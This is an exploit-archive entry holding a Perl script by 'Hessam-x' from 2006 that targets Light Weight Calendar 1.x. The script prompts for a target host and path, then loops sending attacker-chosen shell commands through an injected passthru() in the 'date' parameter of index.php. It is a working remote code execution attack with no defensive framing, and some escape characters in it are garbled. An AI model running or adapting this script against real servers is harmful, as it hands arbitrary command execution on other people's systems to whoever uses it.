[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Light Weight Calendar 1.x (date) Remote Code Execution Vulnerability
# Published : 2006-03-09
# Author : Hessam-x
# Previous Title : FlySpray 0.9.7 (install-0.9.7.php) Remote Commands Execution Exploit
# Next Title : JiRos Banner Experience 1.0 (Create Admin Bypass) Remote Exploit
#!/usr/bin/perl
#
# Light Weight Calendar
# Exploit by Hessam-x (www.hessamx.net)
#
######################################################
# ___ ___ __ #
# / | _____ ____ | | __ ___________________ #
#/ ~ __ _/ ___| |/ // __ _ __ ___ / #
# Y // __ \ ___| < ___/| | // / #
# ___|_ /(____ /___ >__|_ \___ >__| /_____ #
# / / / / / / #
# Iran Hackerz Security Team #
# WebSite: www.hackerz.ir #
# #
######################################################
# Name : Light Weight Calendar #
# version : 1.* #
######################################################
use LWP::Simple;
print "-------------------------------------------n";
print "= Light Weight Calendar =n";
print "= By Hessam-x - www.hackerz.ir =n";
print "-------------------------------------------nn";
print "Target(www.example.com)> ";
chomp($targ = <STDIN>);
print "path: (/lwc/)>";
chomp($path=<STDIN>);
while()
{
print "command:>";
chomp($comd=<STDIN>);
$expl="index.php?hx=".$comd."&date=passthru%28%24_GET%5Bhx%5D%29";
$page=get("http://".$targ.$path.$expl) || die "[-] Exploit failed ...n";
}
# www.Syue.com [2006-03-09]